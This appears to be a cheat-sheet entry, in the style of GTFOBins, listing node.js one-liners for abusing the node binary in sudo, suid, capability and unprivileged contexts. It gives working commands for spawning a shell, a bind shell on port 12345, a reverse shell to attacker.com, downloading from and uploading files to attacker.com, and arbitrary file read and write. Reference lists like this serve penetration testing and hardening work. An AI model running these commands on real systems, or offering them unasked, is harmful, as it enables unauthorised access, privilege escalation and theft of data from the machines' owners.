node

Bind Shell

Context: sudo, suid, unprivileged

node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
  client.pipe(sh.stdin);
  sh.stdout.pipe(client);
  sh.stderr.pipe(client);
}).listen(12345)'

Download

Context: sudo, suid, unprivileged

node -e 'require("http").get("http://attacker.com/path/to/input-file", res => res.pipe(require("fs").createWriteStream("/path/to/output-file")))'

File Read

Context: sudo, suid, unprivileged

node -e 'process.stdout.write(require("fs").readFileSync("/path/to/input-file"))'

File Write

Context: sudo, suid, unprivileged

node -e 'require("fs").writeFileSync("/path/to/output-file", "DATA")'

Reverse Shell

Context: sudo, suid, unprivileged

node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").connect(12345, "attacker.com", function () {
  this.pipe(sh.stdin);
  sh.stdout.pipe(this);
  sh.stderr.pipe(this);
})'

Shell

Context: capabilities, sudo, suid, unprivileged

node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'

Upload

Context: sudo, suid, unprivileged

node -e 'require("fs").createReadStream("/path/to/input-file").pipe(require("http").request("http://attacker.com/path/to/output-file"))'